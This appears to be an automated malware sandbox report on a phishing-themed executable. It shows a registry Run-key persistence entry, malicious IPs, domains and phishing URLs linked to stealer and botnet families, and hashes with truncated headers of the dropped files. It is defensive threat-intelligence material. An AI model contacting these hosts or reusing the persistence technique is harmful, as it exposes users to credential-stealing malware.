                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:05:18 | API Interceptor | 2x Sleep call for process: PURCHASE REQUIRED DETAILS 000487958790903403.exe modified
01:05:39 | API Interceptor | 10x Sleep call for process: alg.exe modified
01:05:45 | API Interceptor | 53x Sleep call for process: ymafvvdS.pif modified
01:06:21 | API Interceptor | 199x Sleep call for process: msdtc.exe modified
06:05:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Sdvvfamy C:\Users\Public\Sdvvfamy.url
06:05:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Sdvvfamy C:\Users\Public\Sdvvfamy.url
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.148.254 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
 | http://begantotireo.xyz | malicious | Unknown | ww38.begantotireo.xyz/favicon.ico
 | http://begantotireo.xyz | malicious | Unknown | ww38.begantotireo.xyz/favicon.ico
 | http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20Lutheran | malicious | Unknown | ww38.watchdogsecurity.online/favicon.ico
 | 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe | malicious | Bdaejec, Socelars | ww12.icodeps.com/?usid=26&utid=7334446481
 | eqqjbbjMlt.elf | malicious | Unknown | ww38.fmoovies.to/
 | http://www.multipool.us | malicious | Unknown | ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
 | http://pollyfill.io | malicious | Unknown | ww38.pollyfill.io/favicon.ico
 | http://simxtrackredirecttszz.pages.dev/ | malicious | Unknown | ww12.ngelit.com/favicon.ico
 | file.exe | malicious | CMSBrute | ww12.runfoxyrun.com/administrator/index.php?usid=18&utid=25958170171
172.234.222.143 | invoice_96.73.exe | malicious | FormBook | fwiwk.biz/kbtuvb
 | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | fwiwk.biz/lrhpwoxhabbo
 | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | przvgke.biz/dadmwtnbmefxvi
 | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | fwiwk.biz/mhwavs
 | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | fwiwk.biz/jwvwqanfys
 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | htwqzczce.biz/qccuqoixlchlyacl
 | AENiBH7X1q.exe | malicious | PureLog Stealer, RedLine | fwiwk.biz/t
 | E_dekont.cmd | malicious | DBatLoader, Nitol, PureLog Stealer, XWorm | fwiwk.biz/fvthsigvq
 | Y2EM7suNV5.exe | malicious | MassLogger RAT | fwiwk.biz/hbfipefumdnnq
 | AsusSetup.exe | malicious | Unknown | przvgke.biz/ejhxrp
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
ssbzmoy.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 18.141.10.107
 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
 | RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
 | invoice_96.73.exe | malicious | FormBook | 18.141.10.107
 | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
 | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
 | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
 | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
przvgke.biz | RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 172.234.222.138
 | invoice_96.73.exe | malicious | FormBook | 172.234.222.143
 | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 172.234.222.143
 | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
 | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 172.234.222.143
 | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.138
                                                                                                                                                                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        76899.bodis.comZiraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                                                                        http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 199.59.243.226
                                                                                                                                                                                                                        http://bonalluterser.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 199.59.243.226
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                                                                                        • 199.59.243.225
                                                                                                                                                                                                                        S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                        • 199.59.243.225
                                                                                                                                                                                                                        xPUqa4qbDL.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 199.59.242.153
                                                                                                                                                                                                                        knjghuig.bizZiraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                        • 18.141.10.107
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)
Match: AKAMAI-ASN1EU
la.bot.arm6.elf | malicious | Mirai | 165.254.13.47
https://quiet-sun-5d9f.atmos4.workers.dev/login | malicious | Unknown | 23.215.17.144
WebUI.dll | malicious | Metamorfo | 172.233.20.237
WebUI.dll | malicious | Unknown | 172.233.20.237
EgnyteDesktopApp_3.19.0_148.msi | malicious | Unknown | 23.200.0.17
Msig Insurance Europe.pdf | malicious | Unknown | 23.195.39.65
jew.arm6.elf | malicious | Unknown | 104.109.128.196
jmggnxeedy.elf | malicious | Unknown | 172.234.216.52
Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.eml | malicious | Unknown | 23.195.39.65
https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#alissa.bessette@eastwesttea.com | malicious | HTMLPhisher, ReCaptcha Phish | 104.116.245.11
Match: AMAZON-02US
Orden_de_Compra_Nmero_6782929219.xls | malicious | HTMLPhisher | 54.150.207.131
OrderSheet.xla.xlsx | malicious | Unknown | 54.150.207.131
OrderSheet.xla.xlsx | malicious | Unknown | 54.150.207.131
OrderSheet.xla.xlsx | malicious | Unknown | 54.150.207.131
rebirth.arm.elf | malicious | Mirai, Okiru | 18.218.112.132
rebirth.spc.elf | malicious | Mirai, Okiru | 54.99.33.239
rebirth.arm6.elf | malicious | Mirai, Okiru | 54.171.230.55
rebirth.arm7.elf | malicious | Mirai, Okiru | 35.155.250.157
rebirth.arm5.elf | malicious | Mirai, Okiru | 13.50.115.226
rebirth.mpsl.elf | malicious | Mirai, Okiru | 34.242.244.192
No context
No context
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1353216
Entropy (8bit):5.324375498442742
Encrypted:false
SSDEEP:12288:YC4VQjGARQNhiIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:YOCAR0iIsqjnhMgeiCl7G0nehbGZpbD
MD5:D4BD8AD02E9CA15C4291FA5C0923C9D0
SHA1:836A1FA2A5493C7E396B30C7E4F02EABFD8DD092
SHA-256:2292F175A6F3446B74C35041073E348090E5252DC85B3D8C2B8C217435110016
SHA-512:38313457E2857C3E166C75AAE7BBB45203EBD4EBC9F8EB5875B1DB66FA851CC0858385B8125FFB571E6BD560039B4D764D8E98696060CFD51692B1E28ED7138B
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1294848
Entropy (8bit):5.2826842616152305
Encrypted:false
SSDEEP:12288:tNUpaKghnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tCMKghsqjnhMgeiCl7G0nehbGZpbD
MD5:E8B15A90322FDFCB1E2921460BFC4D9B
SHA1:5D09913CB84D80777941C16C6A38C63957986AF2
SHA-256:3AF96ACD66A82D692D981447AA1F4E749B0004B5ED1310E86463C9C39D9F399E
SHA-512:C7D142FB9AE4C26D79AEC3EF6D7EE636CCDE6149200343C1F4F30B2F1BADC39A5A62B81C4264BBF94E6EF4829F770A3ED64E7FE4F1F998D33690D1824FCC4608
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... ......B......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1314304
                                                                                                                                                                                                                        Entropy (8bit):5.2741298149489975
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:3MEhwdbT0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pKdH0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:EB9E3362ED7AAEE228EBE420B9278CF8
                                                                                                                                                                                                                        SHA1:58F764F9D71A60371BB33F82D0F31741897819CB
                                                                                                                                                                                                                        SHA-256:8A0C0385C44CC49CF75BE4626E7445E67CA8AAFF3F1EDFA1636B7EBD04C0D262
                                                                                                                                                                                                                        SHA-512:AD4EFD80F255B5705CAB1867EA45E5E5521AA4D34C9ABAC6DA45DC755348F06F4027A6013E2BD16E25167C7636378B664391B7A54E4EA409ECD66DB234817799
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2203136
                                                                                                                                                                                                                        Entropy (8bit):7.647028228244806
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:UK0eqkSR7Xgo4TiRPnLWvJYDmg27RnWGj:UK0pR7Xn4TiRCvJYD527BWG
                                                                                                                                                                                                                        MD5:FEF14850411DDA0057CB8080627E924E
                                                                                                                                                                                                                        SHA1:D906C35CA92672EE6615B59120AF2C0533F1750B
                                                                                                                                                                                                                        SHA-256:8016D4E7094716CE2939A5D8CB7182E7DD2FE5A5D8FA03448BA0E17225BCE69C
                                                                                                                                                                                                                        SHA-512:0BE9173EE67C36607AA07392E1E40A8F626D5CF1D8F9FE0BF59638F147CE6775B35E182B5D6DCAFCCC9864625D9993EDA0FA0A3F21BFF0F68BBE01CDC483E0DE
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".......!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2369024
                                                                                                                                                                                                                        Entropy (8bit):7.565055213660454
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:0fYP1JsEDkSR7Xgo4TiRPnLWvJYDmg27RnWGj:0YPBR7Xn4TiRCvJYD527BWG
                                                                                                                                                                                                                        MD5:E93AB44839E7C99F5DA6DAC478ABCC22
                                                                                                                                                                                                                        SHA1:BEA13EF34C1F3ED22A5B502BADB4D45206CF8BDD
                                                                                                                                                                                                                        SHA-256:4B68C54F7E132D597EC3656D27BDC68E9079B397CB87175A7E407A9E75FD283E
                                                                                                                                                                                                                        SHA-512:5BD9EC41F22ABF534F55AAEB4D29D4E2BC04FA8489DEC41C66DF84B913A56A9AF3D09A3789616ACC23895AF927D1D8CACE24FC416780BBB42867975C402B7F0E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$......w$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1245184
                                                                                                                                                                                                                        Entropy (8bit):5.1235531492868684
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:u62SYUcknn6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:zYUckn6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:FD0F16C283F990CDB6374558D3BC17A7
                                                                                                                                                                                                                        SHA1:38C5E732A1AC1E902E481FBA934F950891C0C647
                                                                                                                                                                                                                        SHA-256:CE0154101D58C6D7C56ADF263342E45771F1102C2AB3AE7FFB9FC4A3BD2DCF9D
                                                                                                                                                                                                                        SHA-512:54A6FFD6902D25366885C47DB57BA225EE64E8E0B468F5D2C4FD79825BD679F2D5DF03D11983FFF4F4410BBB881778A1FDA59C18F928FB989907D55BA0AD6E1E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@.......G.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1640448
                                                                                                                                                                                                                        Entropy (8bit):7.166637768180148
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:i+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaScDmg27RnWGj:mSktbpOD527BWG
                                                                                                                                                                                                                        MD5:2BB38F3CD523D5DBD1B69FCB513DB45F
                                                                                                                                                                                                                        SHA1:8D4F278C83000962C94170FA4311C9D3ED89E281
                                                                                                                                                                                                                        SHA-256:37F2B09E545F33C43207CAABDEA0AE7F98D531A32C252C150BB18C755FA1AD68
                                                                                                                                                                                                                        SHA-512:85BC9016CD58141A3419B74CE8465DFC1C17414B3D3181029ABC557CCED27E7E679501DAAE05CF5EC48559FAB7FABDDEC179FC4AF04115D48A271C71DD37A5E1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.......................................... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2953728
                                                                                                                                                                                                                        Entropy (8bit):7.094597049390765
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:LGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLjDmg27RnWGj:T4OEtwiICvYMRfDD527BWG
MD5:36AB6B8B81D7C4D1F58A9BC7BC646EDD
SHA1:93FAD037C5970C710551042F05C090FC2EF6D460
SHA-256:DD47C9CD6D6ADC56318636297E8D7117D6E0FD06B9B98CDD748B8990B014E666
SHA-512:96AE5233D2073A753AC023257A43533CF17078A9395A6433DDCFF00409A2613B1BD1A4517296CF748493472F7F979A5A3F58BD1AF9BA1B180B72B932355BA394
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.....................................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1485824
Entropy (8bit):5.496373504578079
Encrypted:false
SSDEEP:24576:HAMuR+3kMbVjhYsqjnhMgeiCl7G0nehbGZpbD:gD+lbVjhEDmg27RnWGj
MD5:56CD71808ACF05929FE1B68FBCEE3CED
SHA1:0FDD9FE1FEB19008F7F912B8415EF37CD47F8B6F
SHA-256:27910A860633A0AC53D3579E5A0C9F90603CB4AF9CFCF0FA9C0BF0E7095913C0
SHA-512:4A21E5772D484E8F58844333DCE6D86030F0316D76B5F8EF6310A824D28D357AD5373C7E61571A4B4585693714EB4B95E00C70F2D2934E9EF4F68C71CDF5DA7C
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..................................J.......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1290240
Entropy (8bit):5.277752246227892
Encrypted:false
SSDEEP:12288:yImGUcsvZZdubv7hfl30Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:yxGBcmlksqjnhMgeiCl7G0nehbGZpbD
MD5:BD3B960B1EFB321AF06FE54D1D30C855
SHA1:9CD255F0C702C0AF29D6DEB5AF7C3E0BEE0651A7
SHA-256:53CCE4F01997497F9C4BC4B6BF33174181AD69699C2307066F1FF3A368B5DEFA
SHA-512:FE1FC27185DF9920D83EA6B86F2DD0285389ED1BB11F217DCFBF340E137288823924E3ED9F1214E7CBFD6E79B26E35C42F3691B4B54C86B8123D9E6481512A52
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1644544
Entropy (8bit):5.694781502867505
Encrypted:false
SSDEEP:24576:o0vHyeLj8trn3wsqsqjnhMgeiCl7G0nehbGZpbD:ptj4rgs+Dmg27RnWGj
MD5:664CE19D6A9D8C49DE22D9C24D776C7F
SHA1:B4C41A4B4A6BF5788EA33E6DDB02B3BD759414AD
SHA-256:B6BC0A292FF623B33210EDFE145CF97155A9B4DA4DE9C346CDBACC7D7669EE32
SHA-512:21206D2EB113E82595ECB5B228D26FBF3FCA7798EE7F985A7A27B2DD519E43C77E74D36F6F6BF052F98B5A0C3C8C637D5A8293430777446CCAA7125AE60D17D6
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`.......P......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1781760
Entropy (8bit):7.2796520285468524
Encrypted:false
SSDEEP:24576:eoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZvsqjnhMgeiCl7G0nehbGZpv:b4i0wGJra0uAUfkVy7/ZTDmg27RnWGj
MD5:95FFC09729ABC66B558DF0EF7343B803
SHA1:F660F3CC7B38BCAF1673284E817F75430B7ED3C6
SHA-256:587062D8420A4E90B5B75202ACA9C8DC9E961246604E96293C6ECDAA8E13DDBE
SHA-512:161951D27ED9FB95A1AA9E9C6104FF788C4923083F17443EEF87C3F02A712C1373A8B04230585053027E60BA91F1B507955C09E4647A43C8C4C457E99DB2C143
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
